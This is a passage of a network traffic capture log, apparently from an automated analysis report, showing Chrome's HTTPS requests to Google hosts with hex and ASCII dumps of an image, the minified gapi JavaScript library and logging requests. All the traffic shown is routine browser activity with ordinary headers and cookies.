2024-12-12 21:40:38 UTC	719	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 07 f2 49 44 41 54 78 01 c5 9a 03 f0 ec ea 12 c4 9f 6d a3 74 6d db 38 36 af 6d db b6 6d 9b 87 d7 b6 6d db 58 6f b0 f8 b3 5f 7e b5 e7 4d 6d e5 26 df e6 78 ab ba b2 15 76 cf f4 cc f7 05 3f 9a 13 bf 20 08 7e 5e a9 54 56 2e 97 cb fb 7a 9e 77 4b 84 97 ab d5 aa 1f 2d eb 60 c6 ff 77 a3 e5 1d 11 8e 8f f6 1b e0 fb fe 1f 7f 34 bf 7f 11 89 e5 22 1c 13 91 7a 36 5a e6 22 92 8a 96 a9 60 3b 40 d0 0c 91 e7 21 86 00 cc 53 e2 51 b4 c7 45 04 ee 8b d0 4c 24 eb 10 60 30 31 9e 10 53 28 14 76 8a c4 fc 76 6e 13 5f 19 e2 ee 48 bb 05 b8 10 9d ff cd 48 c4 66 73 9c 38 29 c6 2a f8 d9 08 cd 71 01 96 11 84 5c 1f ed ff f7 39 42 3e f2 e9 7f 29 3e 23 32 17 05 c4 b3 41 8d cd 16 f9 7a bd Data Ascii: PNGIHDR00WIDATxmtm86mmmXo_~Mm&xv? ~^TV.zwK-`w4"z6Z"`;@!SQEL$`01S(vvn_HHfs8)*q\9B>)>#2Az
2024-12-12 21:40:38 UTC	1372	IN	Data Raw: eb dc e4 dd b8 cf fa 3e f3 f9 b4 e8 43 a8 eb e5 a1 0a 8e 5e 50 b9 01 43 db db 25 91 87 3c 84 20 36 e3 18 cf 39 07 82 2c e7 24 30 78 de 4d de 3d cd 60 5c f8 ff 4d 49 2e 91 7c d8 a3 b0 f0 8a fa 1e ff b5 fa 5e fe 83 ea 57 2d 22 88 e7 87 0c 40 04 85 4a fb b3 1e 9e 92 c5 b9 06 ee 4b 98 6d ee 91 1c fd 68 a7 ba d4 78 ef 48 f5 3e f4 63 f5 3e f1 77 21 a2 eb 9e ff aa b4 c5 3a 58 8a 62 25 92 76 cc bc 16 c0 ed 29 93 b6 5b 52 09 84 2d fb f4 3e f2 2b 21 a0 e7 b1 3f ab f7 b9 3f 8a ff 95 9d 16 51 e5 91 47 3a 46 bf a7 e1 a9 b7 6b d6 d0 ac 41 d2 29 60 2a 02 5e 4e 24 1f d4 e5 7b 39 f5 3c bb 50 44 fc 8f 90 37 60 29 d6 33 eb 64 bf d4 0c 06 9e 8e 9d 12 68 af 6b 03 ed 7b 5d 26 d8 be 3b 5e 1e 68 ca 73 3e 42 52 45 50 bb 58 c8 4f 8b 7e 50 7c 5b 10 8e 0b c0 52 5d af 6d 2c bf a1 b4 Data Ascii: >C^PC%< 69,$0xM=`\MI.\|^W-"@JKmhxH>c>w!:Xb%v)[R->+!??QG:FkA)`*^N${9<PD7`)3dhk{]&;^hs>BREPXO~P\|[R]m,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49820	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:38 UTC	2227	OUT	GET /async/hpba?vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBc..i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA%2Fbr%3D1%2Frs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.e [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:39 UTC	1012	IN	HTTP/1.1 200 OK Version: 704846385 X-Content-Type-Options: nosniff Content-Type: text/plain; charset=UTF-8 Content-Disposition: attachment; filename="f.txt" Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:38 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:39 UTC	47	IN	Data Raw: 32 39 0d 0a 29 5d 7d 27 0a 32 31 3b 5b 22 56 6c 68 62 5a 38 37 35 4b 50 4b 48 78 63 38 50 71 36 58 52 55 41 22 2c 22 32 31 33 31 22 5d 0d 0a Data Ascii: 29)]}'21;["VlhbZ875KPKHxc8Pq6XRUA","2131"]
2024-12-12 21:40:39 UTC	66	IN	Data Raw: 33 63 0d 0a 63 3b 5b 32 2c 6e 75 6c 6c 2c 22 30 22 5d 31 62 3b 3c 64 69 76 20 6a 73 6e 61 6d 65 3d 22 4e 6c 6c 30 6e 65 22 3e 3c 2f 64 69 76 3e 63 3b 5b 39 2c 6e 75 6c 6c 2c 22 30 22 5d 30 3b 0d 0a Data Ascii: 3cc;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
2024-12-12 21:40:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49819	172.217.17.78	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:38 UTC	913	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:38 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117446 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Wed, 11 Dec 2024 22:22:46 GMT Expires: Thu, 11 Dec 2025 22:22:46 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 83872 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:38 UTC	475	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b 5f Data Ascii: lue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 Data Ascii: unction(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(a
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 Data Ascii: for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;this
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 Data Ascii: ("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototyp
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 Data Ascii: one)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regula
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 Data Ascii: hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Er
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 Data Ascii: his[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.prototy
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 Data Ascii: tion(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.ne
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 74 Data Ascii: ay.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a\|\|_.la});ma("St

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49822	172.217.19.238	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:38 UTC	539	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://ogs.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://ogs.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-12 21:40:39 UTC	515	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://ogs.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Thu, 12 Dec 2024 21:40:39 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49829	172.217.19.238	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:41 UTC	1126	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 447 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-Type: text/plain;charset=UTF-8 X-Goog-AuthUser: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ogs.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ogs.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
